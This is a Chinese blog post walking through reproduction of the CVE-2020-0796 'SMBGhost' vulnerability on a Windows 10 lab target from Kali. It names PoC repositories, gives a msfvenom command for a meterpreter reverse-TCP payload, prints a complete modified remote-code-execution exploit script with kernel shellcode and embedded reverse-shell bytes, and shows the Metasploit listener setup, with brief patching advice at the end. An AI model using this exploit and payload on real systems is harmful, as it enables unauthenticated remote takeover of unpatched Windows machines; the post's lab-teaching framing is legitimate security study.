CVE-2020-0796永恒之黑漏洞复现 超详细过程(成功复现)

最新推荐文章于 2025-03-27 19:44:29 发布
最新推荐文章于 2025-03-27 19:44:29 发布
阅读量1.2w 收藏 95
点赞数 23
文章标签: windows python 系统安全 网络安全 linux 经验分享 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63610715/article/details/133847253
版权

目录

前言

漏洞描述

影响版本

漏洞复现

环境准备

验证漏洞

漏洞攻击

修复建议

前言

        相信很多朋友们都遇到了一个让人心态崩溃的场景,就是在复现永恒之黑的时候,明明已经知道靶机存在该漏洞,而且能够蓝屏,但就是死活反弹不到shell,于是在网上左搜右搜,发现基本上每个博主的复现方法都一致,但有的最后成功了,有的没有,成功反弹shell的告诉你多试几次。。。。

        但试了N次了,就是成功不了呀,很烦,每次攻击就只会蓝屏重启靶机,把时间浪费在等靶机重启的过程,问题是不论蓝屏多少次,重启多少次,就是反弹不到shell。。。。

        于是,笔者通过种种的试错,集众家经验之所长,写下了这篇文章,希望对你能够有帮助,信我,保你复现成功!!!

漏洞描述

2020年3月,微软公布SMB远程代码执行漏洞(CVE-2020-0796)又称“永恒之黑”,该漏洞由SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,没有检查长度是否合法,最终导致整数溢出,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

影响版本

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows Server, Version 1903 (Server Core installation)

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows Server, Version 1909 (Server Core installation)

漏洞复现

环境准备

靶机ip地址
windows 10192.168.0.153
kali192.168.0.133

查看win10版本

关闭防火墙

使用kali和win10互相ping,确保二者可以通信

验证漏洞

工具下载地址:https://github.com/eerykitty/CVE-2020-0796-PoC

将工具下载后拖至kali中进行解压,进行蓝屏测试

unzip CVE-2020-0796-PoC-master.zip

cd CVE-2020-0796-PoC-master

 ./CVE-2020-0796.py 靶机IP地址

如果出现下面情况,使用以下命令进行安装

pip install ntlm_auth

 继续执行 发现win10出现蓝屏

证明漏洞存在

漏洞攻击

工具下载地址:https://github.com/chompie1337/SMBGhost_RCE_PoC

将工具下载后拖至kali中进行解压

 进入目录

使用msf生成exp反弹shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的IP地址 LPORT=5555 -b '\x00' -i 1 -f python > exploit

-p    //payload

-b   //编码格式

-i    //编码次数

-f    //生成的文件类型

将生成的exploit文件中的 buf 替换为 USER_PAYLOAD

vi exploit

:%s/buf/USER_PAYLOAD

:wq

将工具中 exploit.py中的USER_PAYLOAD部分替换成exploit文件中的内容

也可将我替换好的直接和你的exploit.py文件替换

#!/usr/bin/env python

import sys
import socket
import struct
import argparse

from lznt1 import compress, compress_evil
from smb_win import smb_negotiate, smb_compress

# Use lowstub jmp bytes to signature search
LOWSTUB_JMP = 0x1000600E9
# Offset of PML4 pointer in lowstub
PML4_LOWSTUB_OFFSET = 0xA0
# Offset of lowstub virtual address in lowstub
SELFVA_LOWSTUB_OFFSET = 0x78

# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController
HALP_APIC_REQ_INTERRUPT_OFFSET = 0x78

KUSER_SHARED_DATA = 0xFFFFF78000000000

# Offset of pNetRawBuffer in SRVNET_BUFFER_HDR
PNET_RAW_BUFF_OFFSET = 0x18
# Offset of pMDL1 in SRVNET_BUFFER_HDR
PMDL1_OFFSET = 0x38

# Shellcode from kernel_shellcode.asm
KERNEL_SHELLCODE = b"\x41\x50\x41\x51\x41\x55\x41\x57\x41\x56\x51\x52\x53\x56\x57\x4C"
KERNEL_SHELLCODE += b"\x8D\x35\xB5\x02\x00\x00\x49\x8B\x86\xD8\x00\x00\x00\x49\x8B\x9E"
KERNEL_SHELLCODE += b"\xE0\x00\x00\x00\x48\x89\x18\xFB\x48\x31\xC9\x44\x0F\x22\xC1\xB9"
KERNEL_SHELLCODE += b"\x82\x00\x00\xC0\x0F\x32\x25\x00\xF0\xFF\xFF\x48\xC1\xE2\x20\x48"
KERNEL_SHELLCODE += b"\x01\xD0\x48\x2D\x00\x10\x00\x00\x66\x81\x38\x4D\x5A\x75\xF3\x49"
KERNEL_SHELLCODE += b"\x89\xC7\x4D\x89\x3E\xBF\x78\x7C\xF4\xDB\xE8\xE4\x00\x00\x00\x49"
KERNEL_SHELLCODE += b"\x89\xC5\xBF\x3F\x5F\x64\x77\xE8\x38\x01\x00\x00\x48\x89\xC1\xBF"
KERNEL_SHELLCODE += b"\xE1\x14\x01\x17\xE8\x2B\x01\x00\x00\x48\x89\xC2\x48\x83\xC2\x08"
KERNEL_SHELLCODE += b"\x49\x8D\x74\x0D\x00\xE8\x09\x01\x00\x00\x3D\xD8\x83\xE0\x3E\x74"
KERNEL_SHELLCODE += b"\x0A\x4D\x8B\x6C\x15\x00\x49\x29\xD5\xEB\xE5\xBF\x48\xB8\x18\xB8"
KERNEL_SHELLCODE += b"\x4C\x89\xE9\xE8\x9B\x00\x00\x00\x49\x89\x46\x08\x4D\x8B\x45\x30"
KERNEL_SHELLCODE += b"\x4D\x8B\x4D\x38\x49\x81\xE8\xF8\x02\x00\x00\x48\x31\xF6\x49\x81"
KERNEL_SHELLCODE += b"\xE9\xF8\x02\x00\x00\x41\x8B\x79\x74\x0F\xBA\xE7\x04\x73\x05\x4C"
KERNEL_SHELLCODE += b"\x89\xCE\xEB\x0C\x4D\x39\xC8\x4D\x8B\x89\x00\x03\x00\x00\x75\xDE"
KERNEL_SHELLCODE += b"\x48\x85\xF6\x74\x49\x49\x8D\x4E\x10\x48\x89\xF2\x4D\x31\xC0\x4C"
KERNEL_SHELLCODE += b"\x8D\x0D\xC2\x00\x00\x00\x52\x41\x50\x41\x50\x41\x50\xBF\xC4\x5C"
KERNEL_SHELLCODE += b"\x19\x6D\x48\x83\xEC\x20\xE8\x38\x00\x00\x00\x48\x83\xC4\x40\x49"
KERNEL_SHELLCODE += b"\x8D\x4E\x10\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20\xB8\x05\x00\x00"
KERNEL_SHELLCODE += b"\x00\x44\x0F\x22\xC0\xE8\x19\x00\x00\x00\x48\x83\xC4\x20\xFA\x48"
KERNEL_SHELLCODE += b"\x89\xD8\x5F\x5E\x5B\x5A\x59\x41\x5E\x41\x5F\x41\x5D\x41\x59\x41"
KERNEL_SHELLCODE += b"\x58\xFF\xE0\xE8\x02\x00\x00\x00\xFF\xE0\x53\x51\x56\x41\x8B\x47"
KERNEL_SHELLCODE += b"\x3C\x4C\x01\xF8\x8B\x80\x88\x00\x00\x00\x4C\x01\xF8\x50\x8B\x48"
KERNEL_SHELLCODE += b"\x18\x8B\x58\x20\x4C\x01\xFB\xFF\xC9\x8B\x34\x8B\x4C\x01\xFE\xE8"
KERNEL_SHELLCODE += b"\x1F\x00\x00\x00\x39\xF8\x75\xEF\x58\x8B\x58\x24\x4C\x01\xFB\x66"
KERNEL_SHELLCODE += b"\x8B\x0C\x4B\x8B\x58\x1C\x4C\x01\xFB\x8B\x04\x8B\x4C\x01\xF8\x5E"
KERNEL_SHELLCODE += b"\x59\x5B\xC3\x52\x31\xC0\x99\xAC\xC1\xCA\x0D\x01\xC2\x85\xC0\x75"
KERNEL_SHELLCODE += b"\xF6\x92\x5A\xC3\xE8\xA1\xFF\xFF\xFF\x80\x78\x02\x80\x77\x05\x0F"
KERNEL_SHELLCODE += b"\xB6\x40\x03\xC3\x8B\x40\x03\xC3\x41\x57\x41\x56\x57\x56\x48\x8B"
KERNEL_SHELLCODE += b"\x05\x0E\x01\x00\x00\x48\x8B\x48\x18\x48\x8B\x49\x20\x48\x8B\x09"
KERNEL_SHELLCODE += b"\x66\x83\x79\x48\x18\x75\xF6\x48\x8B\x41\x50\x81\x78\x0C\x33\x00"
KERNEL_SHELLCODE += b"\x32\x00\x75\xE9\x4C\x8B\x79\x20\xBF\x5E\x51\x5E\x83\xE8\x58\xFF"
KERNEL_SHELLCODE += b"\xFF\xFF\x49\x89\xC6\x4C\x8B\x3D\xCF\x00\x00\x00\x31\xC0\x48\x8D"
KERNEL_SHELLCODE += b"\x15\x96\x01\x00\x00\x89\xC1\x48\xF7\xD1\x49\x89\xC0\xB0\x40\x50"
KERNEL_SHELLCODE += b"\xC1\xE0\x06\x50\x49\x89\x01\x48\x83\xEC\x20\xBF\xEA\x99\x6E\x57"
KERNEL_SHELLCODE += b"\xE8\x1E\xFF\xFF\xFF\x48\x83\xC4\x30\x48\x8B\x3D\x6B\x01\x00\x00"
KERNEL_SHELLCODE += b"\x48\x8D\x35\x77\x00\x00\x00\xB9\x1D\x00\x00\x00\xF3\xA4\x48\x8D"
KERNEL_SHELLCODE += b"\x35\x6E\x01\x00\x00\xB9\x58\x02\x00\x00\xF3\xA4\x48\x8D\x0D\xE0"
KERNEL_SHELLCODE += b"\x00\x00\x00\x65\x48\x8B\x14\x25\x88\x01\x00\x00\x4D\x31\xC0\x4C"
KERNEL_SHELLCODE += b"\x8D\x0D\x46\x00\x00\x00\x41\x50\x6A\x01\x48\x8B\x05\x2A\x01\x00"
KERNEL_SHELLCODE += b"\x00\x50\x41\x50\x48\x83\xEC\x20\xBF\xC4\x5C\x19\x6D\xE8\xC1\xFE"
KERNEL_SHELLCODE += b"\xFF\xFF\x48\x83\xC4\x40\x48\x8D\x0D\xA6\x00\x00\x00\x4C\x89\xF2"
KERNEL_SHELLCODE += b"\x4D\x31\xC9\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20\xE8\xA2\xFE\xFF"
KERNEL_SHELLCODE += b"\xFF\x48\x83\xC4\x20\x5E\x5F\x41\x5E\x41\x5F\xC3\x90\xC3\x48\x92"
KERNEL_SHELLCODE += b"\x31\xC9\x51\x51\x49\x89\xC9\x4C\x8D\x05\x0D\x00\x00\x00\x89\xCA"
KERNEL_SHELLCODE += b"\x48\x83\xEC\x20\xFF\xD0\x48\x83\xC4\x30\xC3\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x00\x00\x00\x00\x00"
KERNEL_SHELLCODE += b"\x00\x00\x00"

# Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit?

USER_PAYLOAD =  b""
USER_PAYLOAD += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d"
USER_PAYLOAD += b"\x05\xef\xff\xff\xff\x48\xbb\xb4\x1d\xfa\x3b\x9d"
USER_PAYLOAD += b"\xab\x9a\xb7\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
USER_PAYLOAD += b"\xff\xe2\xf4\x48\x55\x79\xdf\x6d\x43\x56\xb7\xb4"
USER_PAYLOAD += b"\x1d\xbb\x6a\xdc\xfb\xc8\xe6\xe2\x55\xcb\xe9\xf8"
USER_PAYLOAD += b"\xe3\x11\xe5\xd4\x55\x71\x69\x85\xe3\x11\xe5\x94"
USER_PAYLOAD += b"\x50\xcb\xf2\xd5\xa4\x2d\xfd\xfe\x55\x71\x49\xcd"
USER_PAYLOAD += b"\xe3\xab\x77\x18\x21\x9b\x47\x9f\x87\xba\xf6\x75"
USER_PAYLOAD += b"\xd4\xf7\x7a\x9c\x6a\x78\x5a\xe6\x5c\xab\x73\x16"
USER_PAYLOAD += b"\xf9\xba\x3c\xf6\x21\xb2\x3a\x4d\xcd\x1b\xcf\xac"
USER_PAYLOAD += b"\x16\xf8\x34\x18\xd9\x9a\xb7\xb4\x96\x7a\xb3\x9d"
USER_PAYLOAD += b"\xab\x9a\xff\x31\xdd\x8e\x5c\xd5\xaa\x4a\xf3\x3f"
USER_PAYLOAD += b"\x5d\xda\xb0\xd5\xb3\xca\xfe\xb5\xcd\x19\x6d\xd5"
USER_PAYLOAD += b"\x54\x53\xfa\x85\xd4\xbb\xb0\xa9\x23\xd2\xb6\x62"
USER_PAYLOAD += b"\x55\xcb\xfb\xdc\x6a\x53\xba\x18\x5c\xfb\xfa\xa5"
USER_PAYLOAD += b"\x4b\xef\x46\xf8\x1e\xb6\x1f\x95\xee\xa3\x66\xc1"
USER_PAYLOAD += b"\xc5\xa2\x7f\x16\xeb\xbe\xfe\xb5\xcd\x9c\x7a\x16"
USER_PAYLOAD += b"\xa7\xd2\xf3\x3f\x5d\xe6\x72\x9c\x7b\xdb\x3c\xb0"
USER_PAYLOAD += b"\x95\xb2\x3a\x4d\xea\xc2\xf6\xec\x43\xa3\x61\xdc"
USER_PAYLOAD += b"\xf3\xdb\xee\xf5\x47\xb2\xb8\x71\x8b\xdb\xe5\x4b"
USER_PAYLOAD += b"\xfd\xa2\x7a\xc4\xf1\xd2\x3c\xa6\xf4\xb1\xc4\x62"
USER_PAYLOAD += b"\x54\xc7\xfe\x0a\x6a\x89\x09\xc2\x98\xa8\xb7\xb4"
USER_PAYLOAD += b"\x5c\xac\x72\x14\x4d\xd2\x36\x58\xbd\xfb\x3b\x9d"
USER_PAYLOAD += b"\xe2\x13\x52\xfd\xa1\xf8\x3b\x88\x18\x5a\x1f\xb4"
USER_PAYLOAD += b"\x98\xbb\x6f\xd4\x22\x7e\xfb\x3d\xec\xbb\x81\xd1"
USER_PAYLOAD += b"\xdc\xbc\xb0\x4b\xc8\xb6\xb2\x77\xc3\x9b\xb6\xb4"
USER_PAYLOAD += b"\x1d\xa3\x7a\x27\x82\x1a\xdc\xb4\xe2\x2f\x51\x97"
USER_PAYLOAD += b"\xea\xc4\xe7\xe4\x50\xcb\xf2\xd0\x9a\x5a\xff\x4b"
USER_PAYLOAD += b"\xdd\xb2\xb2\x5f\xe3\x65\x77\xfc\x94\x3b\x7a\x27"
USER_PAYLOAD += b"\x41\x95\x68\x54\xe2\x2f\x73\x14\x6c\xf0\xa7\xf5"
USER_PAYLOAD += b"\x45\xb6\xb2\x7f\xe3\x13\x4e\xf5\xa7\x63\x9e\xe9"
USER_PAYLOAD += b"\xca\x65\x62\x31\xdd\x8e\x31\xd4\x54\x54\xc2\x51"
USER_PAYLOAD += b"\xf5\x69\x3b\x9d\xab\xd2\x34\x58\x0d\xb2\xb2\x7f"
USER_PAYLOAD += b"\xe6\xab\x7e\xde\x19\xbb\x63\xd5\x22\x63\xf6\x0e"
USER_PAYLOAD += b"\x1f\x23\xf3\xc2\x54\x4f\x34\x4c\x1d\x84\x6e\xd5"
USER_PAYLOAD += b"\x28\x5e\x97\xea\x94\x0c\x51\xdd\xea\xc3\xdf\xb4"
USER_PAYLOAD += b"\x0d\xfa\x3b\xdc\xf3\xd2\x3e\x46\x55\xcb\xf2\xdc"
USER_PAYLOAD += b"\x11\xc2\x13\xe7\xf8\x05\xee\xd5\x22\x59\xfe\x3d"
USER_PAYLOAD += b"\xda\xb7\x0a\x54\xe2\x13\x47\xfc\x94\x20\x73\x14"
USER_PAYLOAD += b"\x52\xdb\x0d\xb6\xc4\x32\x64\x62\x7e\x19\x4f\xb4"
USER_PAYLOAD += b"\x60\xd2\x63\xdc\xfc\xc3\xdf\xb4\x5d\xfa\x3b\xdc"
USER_PAYLOAD += b"\xf3\xf0\xb7\xee\x5c\x40\x30\xb2\xa4\xaa\x48\x61"
USER_PAYLOAD += b"\x4a\xa3\x7a\x27\xde\xf4\xfa\xd5\xe2\x2f\x72\x62"
USER_PAYLOAD += b"\x65\x73\x8b\x4b\xe2\x05\x73\x9c\x68\xd2\x9e\x72"
USER_PAYLOAD += b"\x55\x7f\xcd\xe8\x1f\xdb\x48\x53\x45\x90\x3b\xc4"
USER_PAYLOAD += b"\xe2\x5d\x75\x44\xa8\x58\x6d\x62\x7e\x9a\xb7"


PML4_SELFREF = 0
PHAL_HEAP = 0
PHALP_INTERRUPT = 0
PHALP_APIC_INTERRUPT = 0
PNT_ENTRY = 0

max_read_retry = 3
overflow_val = 0x1100
write_unit = 0xd0
pmdl_va = KUSER_SHARED_DATA + 0x900
pmdl_mapva = KUSER_SHARED_DATA + 0x800
pshellcodeva = KUSER_SHARED_DATA + 0x950


class MDL:
    def __init__(self, map_va, phys_addr):
        self.next = struct.pack("<Q", 0x0)
        self.size = struct.pack("<H", 0x48)
        self.mdl_flags = struct.pack("<H", 0x5018)
        self.alloc_processor = struct.pack("<H", 0x0)
        self.reserved = struct.pack("<H", 0x0)
        self.process = struct.pack("<Q", 0x0)
        self.map_va = struct.pack("<Q", map_va)
        map_va &= ~0xFFF
        self.start_va = struct.pack("<Q", map_va)
        self.byte_count = struct.pack("<L", 0x258)
        self.byte_offset = struct.pack("<L", (phys_addr & 0xFFF) + 0x4)
        phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12
        self.phys_addr1 = struct.pack("<Q", phys_addr_enc)
        self.phys_addr2 = struct.pack("<Q", phys_addr_enc)
        self.phys_addr3 = struct.pack("<Q", phys_addr_enc)

    def raw_bytes(self):
        mdl_bytes = self.next + self.size + self.mdl_flags + \
                    self.alloc_processor + self.reserved + self.process + \
                    self.map_va + self.start_va + self.byte_count + \
                    self.byte_offset + self.phys_addr1 + self.phys_addr2 + \
                    self.phys_addr3
        return mdl_bytes


def reconnect(ip, port):
    sock = socket.socket(socket.AF_INET)
    sock.settimeout(7)
    sock.connect((ip, port))
    return sock


def write_primitive(ip, port, data, addr):
    sock = reconnect(ip, port)
    smb_negotiate(sock)
    sock.recv(1000)
    uncompressed_data = b"\x41"*(overflow_val - len(data))
    uncompressed_data += b"\x00"*PNET_RAW_BUFF_OFFSET
    uncompressed_data += struct.pack('<Q', addr)
    compressed_data = compress(uncompressed_data)
    smb_compress(sock, compressed_data, 0xFFFFFFFF, data)
    sock.close()


def write_srvnet_buffer_hdr(ip, port, data, offset):
    sock = reconnect(ip, port)
    smb_negotiate(sock)
    sock.recv(1000)
    compressed_data = compress_evil(data)
    dummy_data = b"\x33"*(overflow_val + offset)
    smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data)
    sock.close()


def read_physmem_primitive(ip, port, phys_addr):
    i = 0
    while i < max_read_retry:
        i += 1
        buff = try_read_physmem_primitive(ip, port, phys_addr)
        if buff is not None:
            return buff


def try_read_physmem_primitive(ip, port, phys_addr):
    fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes()
    write_primitive(ip, port, fake_mdl, pmdl_va)
    write_srvnet_buffer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET)

    i = 0
    while i < max_read_retry:
        i += 1
        sock = reconnect(ip, port)
        smb_negotiate(sock)
        buff = sock.recv(1000)
        sock.close()
        if buff[4:8] != b"\xfeSMB":
            return buff


def get_phys_addr(ip, port, va_addr):
    pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))
    pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))
    pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))
    pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))

    pml4e = PML4 + pml4_index*0x8
    pdpt_buff = read_physmem_primitive(ip, port, pml4e)

    if pdpt_buff is None:
        sys.exit("[-] physical read primitive failed")

    pdpt = struct.unpack("<Q", pdpt_buff[0:8])[0] & 0xFFFFF000
    pdpte = pdpt + pdpt_index*0x8
    pdt_buff = read_physmem_primitive(ip, port, pdpte)

    if pdt_buff is None:
        sys.exit("[-] physical read primitive failed")

    pdt = struct.unpack("<Q", pdt_buff[0:8])[0] & 0xFFFFF000
    pdte = pdt + pdt_index*0x8
    pt_buff = read_physmem_primitive(ip, port, pdte)

    if pt_buff is None:
        sys.exit("[-] physical read primitive failed")

    pt = struct.unpack("<Q", pt_buff[0:8])[0]
    
    if pt & (1 << (8 - 1)):
        phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF)
        return phys_addr
    else:
        pt = pt & 0xFFFFF000

    pte = pt + pt_index*0x8
    pte_buff = read_physmem_primitive(ip, port, pte)

    if pte_buff is None:
        sys.exit("[-] physical read primitive failed")

    phys_addr = (struct.unpack("<Q", pte_buff[0:8])[0] & 0xFFFFF000) + \
                (va_addr & 0xFFF)

    return phys_addr


def get_pte_va(addr):
    pt = addr >> 9
    lb = (0xFFFF << 48) | (PML4_SELFREF << 39)
    ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) +
          0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8
    pt = pt | lb
    pt = pt & ub

    return pt


def overwrite_pte(ip, port, addr):
    phys_addr = get_phys_addr(ip, port, addr)

    buff = read_physmem_primitive(ip, port, phys_addr)

    if buff is None:
        sys.exit("[-] read primitive failed!")

    pte_val = struct.unpack("<Q", buff[0:8])[0]

    # Clear NX bit
    overwrite_val = pte_val & (((1 << 63) - 1))
    overwrite_buff = struct.pack("<Q", overwrite_val)

    write_primitive(ip, port, overwrite_buff, addr)


def build_shellcode():
    global KERNEL_SHELLCODE
    KERNEL_SHELLCODE += struct.pack("<Q", PHALP_INTERRUPT +
                                    HALP_APIC_REQ_INTERRUPT_OFFSET)
    KERNEL_SHELLCODE += struct.pack("<Q", PHALP_APIC_INTERRUPT)
    KERNEL_SHELLCODE += USER_PAYLOAD


def search_hal_heap(ip, port):
    global PHALP_INTERRUPT
    global PHALP_APIC_INTERRUPT
    search_len = 0x10000

    index = PHAL_HEAP
    page_index = PHAL_HEAP
    cons = 0
    phys_addr = 0

    while index < PHAL_HEAP + search_len:

        # It seems that pages in the HAL heap are not necessarily contiguous in physical memory, 
        # so we try to reduce number of reads like this 
        
        if not (index & 0xFFF):
            phys_addr = get_phys_addr(ip, port, index)
        else:
            phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF)

        buff = read_physmem_primitive(ip, port, phys_addr)

        if buff is None:
            sys.exit("[-] physical read primitive failed!")

        entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)
        i = 0
        
        # This heuristic seems to be OK to find HalpInterruptController, but could use improvement
        while i < entry_indices:
            entry = struct.unpack("<Q", buff[i:i+8])[0]
            i += 8
            if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000:
                cons = 0
                continue
            cons += 1
            if cons > 3:
                PHALP_INTERRUPT = index + i - 0x40
                print("[+] found HalpInterruptController at %lx"
                      % PHALP_INTERRUPT)

                if len(buff) < i + 0x40:
                    buff = read_physmem_primitive(ip, port, phys_addr + i + 0x38)
                    PHALP_APIC_INTERRUPT = struct.unpack("<Q", buff[0:8])[0]
                    
                    if buff is None:
                        sys.exit("[-] physical read primitive failed!")
                else:
                    PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
                
                print("[+] found HalpApicRequestInterrupt at %lx" % PHALP_APIC_INTERRUPT)
                
                return
        index += entry_indices

    sys.exit("[-] failed to find HalpInterruptController!")


def search_selfref(ip, port):
    search_len = 0x1000
    index = PML4

    while search_len:
        buff = read_physmem_primitive(ip, port, index)
        if buff is None:
            return
        entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)
        i = 0
        while i < entry_indices:
            entry = struct.unpack("<Q",buff[i:i+8])[0] & 0xFFFFF000
            if entry == PML4:
                return index + i
            i += 8
        search_len -= entry_indices
        index += entry_indices


def find_pml4_selfref(ip, port):
    global PML4_SELFREF
    self_ref = search_selfref(ip, port)

    if self_ref is None:
        sys.exit("[-] failed to find PML4 self reference entry!")

    PML4_SELFREF = (self_ref & 0xFFF) >> 3

    print("[+] found PML4 self-ref entry %0x" % PML4_SELFREF)


def find_low_stub(ip, port):
    global PML4
    global PHAL_HEAP

    limit = 0x100000
    index = 0x1000

    while index < limit:
        buff = read_physmem_primitive(ip, port, index)

        if buff is None:
            sys.exit("[-] physical read primitive failed!")

        entry = struct.unpack("<Q", buff[0:8])[0] & 0xFFFFFFFFFFFF00FF

        if entry == LOWSTUB_JMP:
            print("[+] found low stub at phys addr %lx!" % index)
            PML4 = struct.unpack("<Q", buff[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0]
            print("[+] PML4 at %lx" % PML4)
            PHAL_HEAP = struct.unpack("<Q", buff[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000
            print("[+] base of HAL heap at %lx" % PHAL_HEAP)
            return

        index += 0x1000

    sys.exit("[-] Failed to find low stub in physical memory!")


def do_rce(ip, port):
    find_low_stub(ip, port)
    find_pml4_selfref(ip, port)
    search_hal_heap(ip, port)
    
    build_shellcode()

    print("[+] built shellcode!")

    pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA)
    print("[+] KUSER_SHARED_DATA PTE at %lx" % pKernelUserSharedPTE)

    overwrite_pte(ip, port, pKernelUserSharedPTE)
    print("[+] KUSER_SHARED_DATA PTE NX bit cleared!")
    
    # TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function.
    to_write = len(KERNEL_SHELLCODE)
    write_bytes = 0
    while write_bytes < to_write:
        write_sz = min([write_unit, to_write - write_bytes])
        write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes)
        write_bytes += write_sz
    
    print("[+] Wrote shellcode at %lx!" % pshellcodeva)

    input("[+] Press a key to execute shellcode!")
    
    write_primitive(ip, port, struct.pack("<Q", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET)
    print("[+] overwrote HalpInterruptController pointer, should have execution shortly...")
    



if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-ip", help="IP address of target", required=True)
    parser.add_argument("-p", "--port", default=445, help="SMB port, \
                        default: 445", required=False, type=int)
    args = parser.parse_args()

    do_rce(args.ip, args.port)

保存并退出

重新打开一个窗口配置msf并进行监听

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.0.133

set lport 5555

run

 

运行刚修改好的 exploit.py 文件

python3 exploit.py -ip 靶机IP地址

 

运行时可能会出现以上三种情况,解决办法如下

  • 检查win10防火墙是否关闭
  • 检查win10的病毒和威胁防护中的各种保护是否关闭
  • 重启win10 或者恢复快照,这里建议恢复快照,因为关机很有可能就会打上补丁,恢复快照后再检查一下上面两项

 然后再运行exploit.py文件,发现可以成功运行,msf监听的端口也成功反弹shell了

修复建议

更新系统,完成补丁的安装

禁用SMB3.0的压缩功能

关闭SMB通信的445端口

通过ip安全策略屏蔽危险端口,关闭危险服务

unlash~
关注
Kali:简单实现永恒复现漏洞CVE-2020-0796
2201_75638644的博客
03-12 2975
Kali:简单实现永恒复现漏洞CVE-2020-0796,2017年时微软爆出了高危漏洞——永恒之蓝,3年后微软又爆出了一个继永恒之蓝的高危漏洞——永恒,该漏洞所瞄准的服务都是SMB服务。这些漏洞现在都只能是做为初始kali渗透玩家的最基础攻击教程的素材,也只是来用于了解一下基础知识和这么一个使用流程。永恒CVE-2020-0796)是一种影响Windows 10版本1903和1909的漏洞,存在于SMBv3协议中。其他版本的Windows操作系统不受此漏洞影响。
CVE-2020-0796漏洞复现
Jinmindong
03-29 925
CVE-2020-0796是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的;在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。它可让远程且未经身份验证的攻击者在目标系统上执行任意代码,该漏洞类似于永恒之蓝。漏洞危害等级:高。
CVE-2020-0796永恒之蓝2.0(漏洞复现
xinyaoyaotu的博客
01-23 1147
CVE-2020-0796永恒之蓝 2.0” 漏洞再次给我们敲响了网络安全的警钟。了解漏洞的原理、影响范围和防御措施,有助于我们更好地保护自己的系统安全。在日常运维中,要养成及时更新系统、加强网络安全防护的好习惯,共同营造一个安全的网络环境。
分享几个CVE漏洞复现
最新发布
xnxqwzy的博客
03-27 590
